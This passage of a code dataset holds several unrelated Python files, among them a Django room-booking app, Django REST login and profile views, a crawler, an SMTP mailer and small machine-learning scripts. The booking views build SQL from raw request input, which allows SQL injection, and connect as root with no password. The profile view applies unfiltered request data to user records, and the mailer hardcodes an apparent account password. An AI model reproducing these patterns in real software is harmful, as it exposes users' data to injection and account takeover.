request.FILES[\"photo\"]\r\n uploadname = \"hostphotos/\" + str(random.randint(1, 10000)) + file.name\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s=\"update host set hostname='\"+hostname+\"',email='\"+email+\"',city='\"+city+\"',mobile=\"+mobile+\",dp='\"+uploadname+\"',description='\"+description+\"',location='\"+location+\"' where hid=\"+hid+\"\"\r\n fs = FileSystemStorage()\r\n fs.save(uploadname, file)\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n conn.commit()\r\n return HttpResponse(\"success\")\r\n\r\n@csrf_exempt\r\ndef checkout(request):\r\n checkin = request.POST['checkin']\r\n roomid = request.POST['roomid']\r\n checkout = request.POST['checkout']\r\n person = request.POST['person']\r\n extraperson = request.POST['extraperson']\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s = \"select * from booking where roomid='\"+str(roomid)+\"' and (checkin and checkout between '\"+str(checkin)+\"' and '\"+str(checkout)+\"')\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result = cr.fetchone()\r\n if result:\r\n return HttpResponse(\"fail\")\r\n else:\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n q = \"select * from rooms where roomid='\"+str(roomid)+\"'\"\r\n print(roomid)\r\n cr=conn.cursor()\r\n cr.execute(q)\r\n result = cr.fetchone()\r\n tariffsingle = result[6]\r\n tariffdouble = result[7]\r\n extra = result[8]\r\n tsperday=tariffsingle/30\r\n print(tsperday)\r\n tdperday=tariffdouble/30\r\n texperday=extra/30\r\n from datetime import date\r\n print(checkout,checkin)\r\n c1=str(checkin).split(\"-\")\r\n c2=str(checkout).split(\"-\")\r\n d0 = date((int)(c1[0]),(int)(c1[1]),(int)(c1[2]))\r\n d1 = date((int)(c2[0]),(int)(c2[1]),(int)(c2[2]))\r\n delta = d1 - d0\r\n print('no of days ',delta)\r\n total=0\r\n nd = str(delta).split(\" \")\r\n totaldays=(int)(nd[0])\r\n if person =='single':\r\n total = ((float)(tsperday) +((int)(extraperson)*(float)(texperday)))*((int)(totaldays))\r\n total=round(total)\r\n elif person=='double':\r\n total = ((float)(tdperday) +((int)(extraperson)*(float)(texperday)))*((int)(totaldays))\r\n total=round(total)\r\n # elif person=='single' and totaldays>=30:\r\n # total=((float)(tariffsingle) +((int)(extraperson)*(float)(extra)))*((int)(totaldays-30))\r\n # elif person=='double' and totaldays>=30:\r\n # total=((float)(tariffdouble) +((int)(extraperson)*(float)(extra)))*((int)(totaldays-30))\r\n d={\"roomid\":roomid,\"person\":person,\"extrap\":extraperson,\"checkin\":checkin,\"checkout\":checkout,\"charges\":total}\r\n return JsonResponse(d,safe=False)\r\n\r\n@csrf_exempt\r\ndef checkout1(request):\r\n checkin = request.POST['checkin']\r\n roomid = request.POST['roomid']\r\n checkout = request.POST['checkout']\r\n conn = connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n s = \"select * from booking where roomid='\" + str(roomid) + \"' and (checkin and checkout between '\" + str(\r\n checkin) + \"' and '\" + str(checkout) + \"')\"\r\n cr = conn.cursor()\r\n cr.execute(s)\r\n result = cr.fetchone()\r\n if result:\r\n return JsonResponse(\"fail\")\r\n else:\r\n q = \"select * from rooms where roomid='\" + str(roomid) + \"'\"\r\n cr = conn.cursor()\r\n cr.execute(q)\r\n result = cr.fetchone()\r\n tariffsingle = result[6]\r\n tsperday = tariffsingle / 30\r\n from datetime import date\r\n print(checkout, checkin)\r\n c1 = str(checkin).split(\"-\")\r\n c2 = str(checkout).split(\"-\")\r\n d0 = date((int)(c1[0]), (int)(c1[1]), (int)(c1[2]))\r\n d1 = date((int)(c2[0]), (int)(c2[1]), (int)(c2[2]))\r\n delta = d1 - d0\r\n print('no of days ', delta)\r\n total = 0\r\n nd = str(delta).split(\" \")\r\n totaldays = (int)(nd[0])\r\n total=total+(float(tsperday))*((int)(totaldays))\r\n total1=round(total)\r\n d = {\"roomid\": roomid, \"person\": \"single\", \"extrap\": \"0\", \"checkin\": checkin, \"checkout\": checkout,\r\n \"charges\": total1}\r\n return JsonResponse(d, safe=False)\r\n\r\ndef proceedtopayment(request):\r\n rid=request.GET['rid']\r\n persons=request.GET['p']\r\n experson=request.GET['ex']\r\n ckin=request.GET['cin']\r\n ckout=request.GET['cout']\r\n total=request.GET['total']\r\n print(total)\r\n hostid=request.GET['hid']\r\n s=str(total).split(\".\")\r\n print(s)\r\n ts=(float)(s[0])*100\r\n d={\"rid\":rid,\"persons\":persons,\"extra\":experson,\"checkin\":ckin,\"checkout\":ckout,\"total\":total,\"ts\":ts,\"hid\":hostid}\r\n conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n s=\"select * from rooms where roomid='\"+rid+\"'\"\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n row=cr.fetchone()\r\n d1={\"roomname\":row[1],\"area\":row[2],\"description\":row[3],\"coverphoto\":row[4],\"hid\":row[5]}\r\n # print(d1)\r\n q=\"select * from user where email='\"+request.session['useremail']+\"'\"\r\n cr.execute(q)\r\n row1=cr.fetchone()\r\n d2={\"mobile\":row1[0],\"email\":row1[1],\"name\":row1[3],\"address\":row1[4]}\r\n return render(request,\"proceedtopayment.html\",{\"ar\":d,\"ar1\":d1,\"ar2\":d2})\r\n\r\n\r\ndef proceedtopayment1(request):\r\n rid=request.GET['rid']\r\n ckin=request.GET['cin']\r\n ckout=request.GET['cout']\r\n total=request.GET['total']\r\n hostid = request.GET['hid']\r\n s=str(total).split(\".\")\r\n ts=(float)(s[0])*100\r\n d={\"rid\":rid,\"checkin\":ckin,\"checkout\":ckout,\"total\":total,\"ts\":ts,\"hid\":hostid}\r\n conn=connect(\"127.0.0.1\",\"root\",\"\",\"sparespace\")\r\n s=\"select * from rooms where roomid='\"+rid+\"'\"\r\n cr=conn.cursor()\r\n cr.execute(s)\r\n row=cr.fetchone()\r\n d1={\"roomname\":row[1],\"area\":row[2],\"description\":row[3],\"coverphoto\":row[4],\"hid\":row[5],\"tariffsingle\": row[6], \"tariffdouble\": row[7], \"extraperson\": row[8], \"rating\": row[9],\r\n \"count\": row[10], \"category\": row[11]}\r\n # print(d1)\r\n q = \"select * from user where email='\" + request.session['useremail'] + \"'\"\r\n cr.execute(q)\r\n row1 = cr.fetchone()\r\n d2 = {\"mobile\": row1[0], \"email\": row1[1], \"name\": row1[3], \"address\": row1[4]}\r\n return render(request,\"proceedtopayment1.html\",{\"ar\":d,\"ar1\":d1,\"ar2\":d2})\r\n\r\n@csrf_exempt\r\ndef userbooking(request):\r\n dateofbooking = date.today()\r\n roomid = request.POST['roomid']\r\n tariff = request.POST['persons']\r\n extraperson = request.POST['extraperson']\r\n checkin = request.POST['checkin']\r\n chkout = request.POST['checkout']\r\n bookeremail=request.POST['email']\r\n bookeraddress=request.POST['address']\r\n bookermobile=request.POST['mobile']\r\n hostid=request.POST['hostid']\r\n total=request.POST['total']\r\n print(total)\r\n paymentmode = request.POST['paymentmode']\r\n paymentstatus = \"success\"\r\n if paymentmode == \"Cash\":\r\n total = 0.0\r\n paymentstatus = \"pending\"\r\n conn = Connect(\"127.0.0.1\", \"root\", \"\", \"sparespace\")\r\n q = f\"insert into booking values(NULL,'{roomid}','{tariff}','{extraperson}','{checkin}','{chkout}','{bookeremail}','{bookeraddress}','{bookermobile}','{hostid}','{total}','{dateofbooking}','{paymentmode}','{paymentstatus}','pending')\"\r\n print(q)\r\n cr=conn.cursor()\r\n cr.execute(q)\r\n bookingid = cr.lastrowid\r\n conn.commit()\r\n msg = \"Your booking is successfully Done!!\"\r\n return JsonResponse({\"bookingid\": bookingid}, safe=False)\r\n\r\ndef thankspage(request):\r\n bookingid = request.GET[\"bookingid\"]\r\n amount = request.GET[\"amount\"]\r\n status = request.GET[\"status\"]\r\n return render(request,\"thankspage.html\",{\"amount\":amount,\"bookingid\":bookingid,\"status\":status})","sub_path":"DJango_project/SpareSpace/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":37296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"341009663","text":"# -*- coding:utf-8 -*-\nfrom app.models import WxNotifyTemplate\n\nLINK_COLOR = '#173177'\nNORMAL_COLOR = '#000000'\nFAILED_COLOR = '#DC143C'\nYOOQUN_COLOR = '#E75D29'\n\n\nclass WxTempNotifierBase:\n def __init__(self, session, wechat_service):\n self.session = session\n self.wechat_service = wechat_service\n\n def get_temp(self, code):\n return self.session.query(WxNotifyTemplate).filter_by(code=code).first()\n\n def send_notification(self, to_openid, template, data, url=None):\n try:\n self.wechat_service.message.send_template(to_openid, template.template_id, data, url)\n except Exception as e:\n print(e)\n","sub_path":"app/services/wechat_notifier/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"277864107","text":"import uuid\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import GenericViewSet\n\nfrom clubs.models import Club\nfrom clubs.models import Institute\nfrom clubs.serializers import InstituteSerializer\nfrom users.models import User\nfrom users.models import Token\nfrom users.serializers import UserSerializer\nfrom utils import restful_status\nfrom clubs.serializers import ClubSerializer\n\n\nclass RegisterView(APIView):\n\n authentication_classes = []\n\n def post(self, request, *args, **kwargs):\n ret_data = {\n 'status': restful_status.STATUS_SUCCESS,\n 'msg': ''\n }\n username = request.data.get('username')\n # 用户名已经存在\n if User.objects.filter(username=username).count():\n ret_data['status'] = restful_status.STATUS_ERROR\n ret_data['msg'] = username + ' 用户名已���存在'\n return Response(ret_data)\n # password is md5 code\n password = request.data.get('password')\n nickname = request.data.get('nickname')\n mobile = request.data.get('mobile')\n admission_time = request.data.get('admission_time')\n is_admin = False\n institute_id = request.data.get('institute_id')\n # 注册用户名\n user = User.objects.create(username=username, password=password,\n nickname=nickname, is_admin=is_admin, institute_id=institute_id,\n mobile=mobile, admission_time=admission_time)\n ret_data['msg'] = username + ' 注册成功'\n return Response(ret_data)\n\n\nclass LoginView(APIView):\n \"\"\"用户登录 View\n\n Notes\n -----\n 拦截用户的登录 POST 请求, 进行登录\n \"\"\"\n\n # 用户登录不需要认证\n authentication_classes = []\n\n def post(self, request, *args, **kwargs):\n \"\"\"POST 请求\n\n Parameters\n ----------\n request : DRF Request 对象\n\n Returns\n -------\n ret_data : DRF Response\n \"\"\"\n ret_data = {\n 'status': restful_status.STATUS_SUCCESS,\n 'msg': ''\n }\n\n username = request.data.get('username')\n password = request.data.get('password')\n user = User.objects.filter(username=username, password=password).values('id', 'username')\n if user.count():\n user = user.first()\n token = uuid.uuid4()\n Token.objects.update_or_create(user_id=user.get('id'),\n defaults={'user_id': user.get('id'), 'token': token})\n ret_data['msg'] = '登录成功'\n ret_data['username'] = username\n ret_data['userId'] = user.get('id')\n ret_data['token'] = token\n return Response(ret_data)\n ret_data['status'] = restful_status.STATUS_ERROR\n ret_data['msg'] = '用户名或者密码错误'\n return Response(ret_data)\n\n\nclass UserViewSet(GenericViewSet):\n\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n def list(self, request, *args, **kwargs):\n ret_data = {\n 'status': restful_status.STATUS_SUCCESS\n }\n club_id = request.query_params.get('clubId')\n club = Club.objects.filter(id=club_id).first()\n users = User.objects.filter(clubs=club)\n ret_data['users'] = self.serializer_class(users, many=True).data\n return Response(ret_data)\n\n def retrieve(self, request, *args, **kwargs):\n ret_data = {\n 'status': restful_status.STATUS_SUCCESS\n }\n user_id = request.META.get('PATH_INFO').split('/')[-2]\n queryset = self.queryset\n token = Token.objects.filter(user_id=user_id).values('token').first()\n user = queryset.filter(id=user_id).values('id', 'username',\n 'nickname', 'mobile',\n 'introduction', 'institute_id',\n 'admission_time').first()\n institute_id = user.get('institute_id')\n institute = Institute.objects.filter(id=institute_id).first()\n institute_serializer = InstituteSerializer(institute)\n ret_data['user'] = user\n ret_data['institute'] = institute_serializer.data\n if token.get('token') == request.auth:\n # 已登录用户查看自己信息, 查询社团信息\n clubs = Club.objects.filter(user=queryset.filter(id=user_id).first())\n club_serializer = ClubSerializer(clubs, many=True)\n ret_data['clubs'] = club_serializer.data\n return Response(ret_data)\n\n def patch(self, request, *args, **kwargs):\n ret_data = {\n 'status': restful_status.STATUS_SUCCESS\n }\n user_id = request.META.get('PATH_INFO').split('/')[-2]\n token = Token.objects.filter(user_id=user_id).values('token').first()\n if not token:\n ret_data['status'] = restful_status.STATUS_ERROR\n ret_data['msg'] = '非法携带 token'\n return Response(ret_data)\n if token.get('token') == request.auth:\n user = User.objects.filter(id=user_id).update(**request.data['dict'])\n else:\n ret_data['status'] = restful_status.STATUS_ERROR\n ret_data['msg'] = '非法操作'\n return Response(ret_data)\n\n def delete(self, request, *args, **kwargs):\n ret_data = {\n 'status': restful_status.STATUS_SUCCESS\n }\n user_id = request.META.get('PATH_INFO').split('/')[-2]\n token = Token.objects.filter(user_id=user_id).first()\n if token.token == request.auth:\n token.delete()\n else:\n ret_data['status'] = restful_status.STATUS_ERROR\n ret_data['msg'] = '非法退出'\n return Response(ret_data)","sub_path":"apps/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"305035647","text":"#!/usr/bin/env python\r\nimport requests\r\nimport urllib\r\nfrom urllib.request import urlopen\r\nfrom link_finder import LinkFinder\r\nfrom general import *\r\n\r\nclass Spider:\r\n # class variable which is shared among all instances\r\n project_name=''\r\n base_url=''\r\n domain_name=''\r\n queue_file=''\r\n crawled_file=''\r\n queue=set()\r\n crawled=set()\r\n def __init__(self,project_name,base_url):\r\n Spider.projct_name=project_name\r\n Spider.base_url=base_url\r\n Spider.domain_name=domain_name\r\n Spider.queue_file=Spider.projct_name + '/queue.txt'\r\n Spider.crawled=Spider.projct_name + '/crawled.txt'\r\n self.boot()\r\n self.crawled_page('First Spider',Spider.base_url)\r\n @staticmethod\r\n def boot():\r\n create_project_dir(Spider.project_name)\r\n create_data_files(Spider.projct_name, Spider.base_url)\r\n Spider.queue=file_to_set(Spider.crawled_file)\r\n \r\n @staticmethod\r\n def crawled_page(thread_name, page_url):\r\n if page_url not in Spider.crawled:\r\n print(thread_name +'crawling' + page_url)\r\n print('Queue' + str(len(Spider.queue) + '| Crawled' + str(len(Spider.crawled))))\r\n Spider.add_links_to_queue(Spider.gather_link(page_url))\r\n Spider.queue.remove(page_url)\r\n Spider.crawled.add(page_url)\r\n Spider.update_files()\r\n \r\n @staticmethod\r\n def gather_links(page_url):\r\n html_string=''\r\n # anytime we are working with networking type of stuff we always put it in try except stuff\r\n try:\r\n response = urlopen(page_url) # helps to connect to web page\r\n if response.getheader('Content-Type')=='text/html':\r\n html_bytes=response.read()\r\n html_string=html_bytes.decode('utf-8')\r\n finder=LinkFinder(Spider.base_url,page_url)\r\n finder.feed(html_string)\r\n except:\r\n print(\" Error !! Cannot crawl page\")\r\n return set()\r\n return finder.page_links()\r\n ","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"552906031","text":"import sys\nassert sys.version_info >= (3, 5)\n\nimport sklearn\nassert sklearn.__version__ >= \"0.20\"\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nimport tensorflow as tf\nfrom tensorflow import keras\n\ndef generate_time_series(batch_size, n_steps):\n freq1, freq2, offsets1, offsets2 = np.random.rand(4, batch_size, 1)\n time = np.linspace(0, 1, n_steps)\n series = 0.5 * np.sin((time - offsets1) * (freq1 * 10 + 10)) # wave 1\n series += 0.2 * np.sin((time - offsets2) * (freq2 * 20 + 20)) # + wave 2\n series += 0.1 * (np.random.rand(batch_size, n_steps) - 0.5) # + noise\n return series[..., np.newaxis].astype(np.float32)\n\nn_steps = 50\nseries = generate_time_series(10000, n_steps + 1)\nX_train, y_train = series[:7000, :n_steps], series[:7000, -1]\nX_valid, y_valid = series[7000:9000, :n_steps], series[7000:9000, -1]\nX_test, y_test = series[9000:, :n_steps], series[9000:, -1]\n\nmodel = keras.models.Sequential([\n keras.layers.Flatten(input_shape=[50, 1]),\n keras.layers.Dense(1)\n])\n\n\n#determine number of epochs\nno_epochs = 20\n\n#set error and optimizer\nmodel.compile(loss=\"mse\", optimizer=\"adam\")\n\nhistory = model.fit(X_train, y_train, epochs=no_epochs, validation_data=(X_valid, y_valid))\nevalu = model.evaluate(X_valid, y_valid)\nprint(history)\nprint(evalu)\nprint(model.metrics_names, evalu)\n","sub_path":"linearRegression.py","file_name":"linearRegression.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"570031897","text":"import matplotlib.pyplot as plt\nfrom sklearn.metrics.regression import r2_score\n\n\ndef plotScatterPlot(actual, predicted, outFileName):\n 'Make a scatter plot showing the predicted vs actual activation energy for each reaction'\n plt.scatter(actual, predicted, s=7, color='#4b9da6')\n axes = plt.gca()\n\n # make plot square with equal x and y axes\n bounds = [min(list(actual) + list(predicted) + [0])-1, max(list(actual) + list(predicted))+1]\n plt.axis(bounds * 2)\n axes.set_aspect('equal', adjustable='box')\n\n # plot the identity for visual reference (10% darker than data)\n plt.plot([bounds[0], bounds[1]], [bounds[0], bounds[1]], color='#d95d41')\n\n rSquared = r2_score(actual, predicted)\n print(rSquared)\n plt.figtext(0.6,0.15,'$R^2 = $'+format(rSquared,'.4f'), fontsize=11)\n plt.xlabel('QM Calculated Hydricity (kcal/mol)', fontsize=10)\n plt.ylabel('Model Predicted Hydricity (kcal/mol)', fontsize=10)\n plt.title('Model Predicted vs. QM Calculated Hydricity', fontsize=12)\n plt.tight_layout()\n plt.savefig(str(outFileName) + '.png')\n plt.clf()\n","sub_path":"Python/scatterPlot_hydricitybest.py","file_name":"scatterPlot_hydricitybest.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"163723312","text":"# Import smtplib for the actual sending function\nimport sys\nimport getopt\nimport smtplib\n\nsender = 'congxv@rayootech.com'\n# If there are more than one receiver, you need to ganerate a list. \n# receiver = ['a@xxxx','b@xxxx']\nreceiver = ['congxv@rayootech.com'] \nserver = 'smtp.qiye.163.com'\nport = '25'\npwd = 'xucong(5493177)'\n\nCOMMASPACE = ', '\n\n# Import the email modules we'll need\nfrom email.mime.text import MIMEText\n\ndef usage():\n usageStr = '''Usage: SendEmail -c mail_content'''\n #print usageStr\n\ndef main(argv):\n # Get the Email content in the \"-c\" argv\n try:\n opts, args = getopt.getopt(argv, \"c:\")\n except getopt.GetoptError:\n usage()\n sys.exit(2)\n\n content = ''\n\n for opt, arg in opts:\n if opt == '-c':\n content = arg\n\n #print content\n\n msg = MIMEText(content)\n \n msg['Subject'] = 'this is the subject'\n msg['From'] = sender\n msg['To'] = COMMASPACE.join(receiver)\n \n s = smtplib.SMTP(server, port)\n s.ehlo()\n s.login(sender, pwd)\n s.sendmail(sender, receiver, msg.as_string())\n s.quit()\n\nif __name__==\"__main__\":\n main(sys.argv[1:])\n\n","sub_path":"Python/testSendEmail.py","file_name":"testSendEmail.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"169465553","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\nfunction: realize gru by pytorch with nn.Module\r\n\"\"\"\r\n\r\nimport sys\r\nimport torch\r\nimport torch.nn as nn\r\n\r\nsys.path.append(\"../d2l_func/\")\r\nfrom data_prepare import load_data_jay_song, data_iter_random, data_iter_consecutive, to_onehot\r\nfrom model_train import train_rnn_pytorch\r\n\r\n\r\nclass RNNModel(nn.Module):\r\n def __init__(self, rnn_layer, vocab_size):\r\n super(RNNModel, self).__init__()\r\n self.rnn = rnn_layer\r\n self.hidden_num = self.rnn.hidden_size * (2 if self.rnn.bidirectional else 1)\r\n self.vocab_size = vocab_size\r\n self.fc = nn.Linear(hidden_num, vocab_size)\r\n self.h_state = None\r\n\r\n def forward(self, x, h_state):\r\n # x.shape is (num_step, batch_size, vocab_size)\r\n y, self.h_state = self.rnn(x, h_state)\r\n return self.fc(y), self.h_state\r\n\r\n\r\ndef predict_rnn_pytorch(prefix, pred_num, model, char_to_idx, vocab_set, vocab_size, device):\r\n outputs = [char_to_idx[prefix[0]]]\r\n h_state = None\r\n\r\n for i in range(len(prefix) + pred_num - 1):\r\n inputs = to_onehot(torch.tensor(outputs[-1]).view(-1, 1), vocab_size, device)\r\n if h_state is not None:\r\n if isinstance(h_state, tuple): # lstm , (h,c)\r\n h_state = (h_state[0].to(device), h_state[1].to(device))\r\n else:\r\n h_state = h_state.to(device)\r\n\r\n y, h_state = model(inputs, h_state)\r\n if i + 1 < len(prefix):\r\n outputs.append(char_to_idx[prefix[i + 1]])\r\n else:\r\n outputs.append(y.argmax(dim=2).item())\r\n\r\n return \"\".join(vocab_set[i] for i in outputs)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # load data\r\n corpus_index, char_to_idx, vocab_set, vocab_size = load_data_jay_song()\r\n # model\r\n hidden_num = 256\r\n rnn_layer = nn.GRU(vocab_size, hidden_num)\r\n model = RNNModel(rnn_layer, vocab_size)\r\n model = model.cuda()\r\n loss = nn.CrossEntropyLoss()\r\n optimizer = torch.optim.Adam(model.parameters(), lr=0.001)\r\n\r\n params = {\r\n \"epoch_num\": 10,\r\n \"model\": model,\r\n \"loss\": loss,\r\n \"optimizer\": optimizer,\r\n \"batch_size\": 64,\r\n \"num_step\": 32,\r\n \"corpus_index\": corpus_index,\r\n \"data_iter\": data_iter_consecutive,\r\n \"char_to_idx\": char_to_idx,\r\n \"vocab_set\": vocab_set,\r\n \"vocab_size\": vocab_size,\r\n \"predict_rnn_pytorch\": predict_rnn_pytorch,\r\n \"pred_num\": 50,\r\n \"prefixs\": [\"分开\", \"不分开\"],\r\n \"random_sample\": False\r\n }\r\n\r\n params[\"batch_num\"] = len(list(data_iter_consecutive(corpus_index, params[\"batch_size\"],\r\n params[\"num_step\"], \"cpu\")))\r\n\r\n train_rnn_pytorch(**params)\r\n","sub_path":"7.RNNs/gru_pytorch_sample.py","file_name":"gru_pytorch_sample.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"583084255","text":"# -- coding: utf-8 --\n\n# Copyright 2018 Olivier Scholder \n\nfrom PyQt5.QtCore import QSize\nfrom PyQt5.QtWidgets import QWidget, QVBoxLayout, QSizePolicy\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar\nfrom matplotlib.figure import Figure\n\n\nclass MplCanvas(FigureCanvas):\n def __init__(self):\n self.fig = Figure()\n FigureCanvas.__init__(self, self.fig)\n FigureCanvas.setSizePolicy(self,\n QSizePolicy.Expanding,\n QSizePolicy.Expanding)\n FigureCanvas.updateGeometry(self)\n\n def sizeHint(self):\n w, h = self.get_width_height()\n return QSize(w, h)\n\n\nclass MplWidget(QWidget):\n def __init__(self, parent=None):\n QWidget.__init__(self, parent)\n self.canvas = MplCanvas()\n self.mpl_toolbar = NavigationToolbar(self.canvas, self)\n layout = QVBoxLayout()\n self.setLayout(layout)\n layout.addWidget(self.mpl_toolbar)\n layout.addWidget(self.canvas)\n","sub_path":"pySPM/mplwidget.py","file_name":"mplwidget.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"343682673","text":"#!/usr/bin/python3\n\nimport json\nimport glob\nimport pprint\n\n\ndef group_by(ds, k):\n\tret = {}\n\tfor d in ds:\n\t\tif d[k] not in ret:\n\t\t\tret[d[k]] = []\n\t\tret[d[k]].append(d)\n\treturn ret\n\n\ndef load_all():\n\tfor fn in glob.glob('*.jsons'):\n\t\tyield from load(fn)\n\n\ndef load(fn):\n\twith open(fn) as f:\n\t\tfor line in f:\n\t\t\tline = line.strip()\n\t\t\td = json.loads(line)\n\t\t\tyield d\n\n\ndef count_it(d):\n\tret = {}\n\tfor k, v in d.items():\n\t\tret[k] = {}\n\t\tfor k2, v2 in v.items():\n\t\t\tcount = len(v2)\n\t\t\tret[k][k2] = count\n\treturn ret\n\n\ndef main():\n\tby_mj = group_by(load_all(), 'mj')\n\tby_mj_k = {k: group_by(v, 'k') for k, v in by_mj.items()}\n\twith open('pulseout.txt', 'w') as f:\n\t\tpprint.pprint(by_mj_k, f)\n\tcounted = count_it(by_mj_k)\n\twith open('pulseout_count.txt', 'w') as f:\n\t\t#print(json.dumps(counted, indent=2))\n\t\tpprint.pprint(counted, f)\n\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"pulseout.py","file_name":"pulseout.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"88887926","text":"import sys\nsys.path.append('/Users/mauroconte/Desktop/iogif/src/')\n\nimport numpy as np\nimport cv2\nimport os\nimport uuid\nimport time\n\nimport util\nfrom vector_quantization import *\n\ndef compose_h_w(module=64, n=9):\n images = list(map(lambda name: cv2.imread(f'tmp/{name}',1), os.listdir('tmp')))\n randoms = []\n if n**2-len(images)>0:\n randoms = np.random.randint(0, len(images), n**2-len(images))\n\n for index in randoms:\n images.append(images[index])\n\n for i in range(len(images)):\n images[i] = cv2.resize(images[i], (module, module), interpolation = cv2.INTER_AREA)\n\n base = np.zeros((module*n,module*n, 3),np.uint8)\n for i in range(n**2):\n r,c = i//n, i%n\n base[r*module:(r+1)*module, c*module:(c+1)*module] = images[i]\n\n cv2.imwrite(\"io9x9.png\",base)\n\ndef main():\n\n _id = uuid.uuid4()\n\n img = util.get_billie()\n\n print(\"Vector Quantization (LBG) on iamge of shape:\", img.shape)\n q, _, _ = LGB(img, 4)\n cv2.imwrite(\"out/q4.png\",q)\n\n img = cv2.imread('out/q4.png')\n os.makedirs(f'out/{_id}')\n for i in range(10):\n print(\"colormap\", i)\n img = util.colormap(img,[])\n cv2.imwrite(f'out/{_id}/{uuid.uuid4()}.png', img)\n\n util.make_gif_from_folder(f'out/{_id}')\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"422398292","text":"# https://www.geeksforgeeks.org/find-the-row-with-maximum-number-1s/\n\n# Given a boolean 2D array of n x m dimensions where each row is sorted.\n# Find the 0-based index of the first row that has the maximum number of 1's.\n\ndef rowWithMax1s(arr, n, m):\n row_index = -1\n # for i in range(m):\n # if arr[0][i] == 1:\n # row_index = 0\n # col_index = i\n # break\n # if col_index is None:\n # col_index = m-1\n col_index = m-1\n for i in range(n):\n while col_index >= 0 and arr[i][col_index] == 1:\n col_index -= 1\n row_index = i\n return row_index\n\nn1 = [0,1,1,1]\nn2 = [0,0,1,1]\nn3 = [1,1,1,1]\nn4 = [0,0,0,1]\narr =[]\narr.append(n1)\narr.append(n2)\narr.append(n3)\narr.append(n4)\nprint(rowWithMax1s(arr, 4, 4))","sub_path":"lc/max_num_of_1s.py","file_name":"max_num_of_1s.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"294061669","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport pyfirmata\nimport datetime\nimport matplotlib.animation as animation\n\nclass Motor:\n\t'Common base class for all employees'\n\tMotCount = 0\n\n\tdef __init__(self, pos, l, w):\n\t\tMotor.MotCount += 1\n\t\tself.vel = 0\n\t\tself.pos = pos\n\t\tself.l = l\n\t\tself.w = w\n\n\tdef set_vel(self, v, ang):\n\t\tang = ang*np.pi/180\n\t\ta = self.l/(np.tan(ang) + 1e-5)\n\t\tif self.pos=='der':\n\t\t\tself.vel = v*(1 + self.w/2/a)\n\t\telif self.pos=='izq':\n\t\t\tself.vel = v*(1 - self.w/2/a)\n","sub_path":"motor.py","file_name":"motor.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"460911336","text":"from flask import (\n Blueprint, g, request, session\n)\n\nfrom hermes.db import get_db\nfrom uuid import uuid4\n\nimport datetime\nimport random\n\nbp = Blueprint('queries', __name__)\n\n# Categories\ndef category_values_for_current_org():\n # SUM value of transactions for given category\n db = get_db()\n\n category_values = db.execute(\n 'SELECT'\n ' *, '\n ' CASE'\n ' WHEN sum(trans_value_net) is Null THEN 0'\n ' ELSE sum(trans_value_net)'\n ' END AS \"value\"'\n ' FROM'\n ' categories'\n ' LEFT JOIN'\n ' transactions on category_id_fk = category_id'\n ' JOIN'\n ' category_type on cat_type_id = cat_type_id_fk'\n ' WHERE'\n ' categories.org_id_fk = ?'\n ' GROUP BY'\n ' category_id'\n ' ORDER BY'\n ' cat_type_order ASC,'\n ' value DESC',\n (\n session['current_org'],\n )\n ).fetchall()\n\n return category_values\n\n\ndef get_transactions_for_category(category_id):\n db = get_db()\n\n transactions = db.execute(\n 'SELECT'\n ' *'\n ' FROM'\n ' transactions'\n ' JOIN'\n ' user on user_id = user_id_fk'\n ' WHERE'\n ' org_id_fk = ? and'\n ' category_id_fk = 